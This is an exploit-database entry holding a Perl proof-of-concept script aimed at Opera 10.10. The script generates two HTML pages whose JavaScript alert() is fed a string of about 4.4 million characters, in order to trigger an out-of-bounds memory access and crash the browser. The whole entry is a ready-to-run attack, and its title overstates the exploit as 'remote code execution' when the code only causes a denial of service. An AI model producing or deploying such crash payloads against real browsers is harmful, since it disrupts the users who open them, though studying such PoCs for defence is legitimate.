Opera 10.10 Remote Code Execution DoS Exploit

2010-02-05T00:00:00
ID 1337DAY-ID-10692
Type zdt
Reporter cr4wl3r
Modified 2010-02-05T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            =============================================
Opera 10.10 Remote Code Execution DoS Exploit
=============================================

#!/usr/bin/perl
 
 
# Title : Opera 10.10 Remote Code Execution DoS Exploit
# Tested : Windows xp (sp2)
 
# Description : Opera Web Browser is vulnerable DoS within its javascript tags (alert)
# This issue can be exploited by using a large value in a alert tags to create an out-of-bounds memory access
 
 
print qq(
###################################################
## Opera 10.10 Remote Code Execution DoS Exploit ##
## Credits : Dj7xpl                              ##
###################################################
);
 
my $header = "<html>\n<script>\n";
my $footer = "</script>\n</html>";
 
 
my $uhoh1 = "var buf = 'A';\n".
           "while (buf.length <= 4444444) buf+=buf;\n".
           "alert(buf)\n";
 
##################################################################
open(myfile,'>> uhoh1.html');
print myfile $header.$uhoh1.$footer;
##################################################################
 
 
my $uhoh2 = "alert(\'". "A" x 4444444 ."'\)"."\n";
 
##################################################################
open(myfile,'>> uhoh2.html');
print myfile $header.$uhoh2.$footer;
##################################################################
 
print "\nDone, successfully created!\n";



#  0day.today [2018-03-19]  #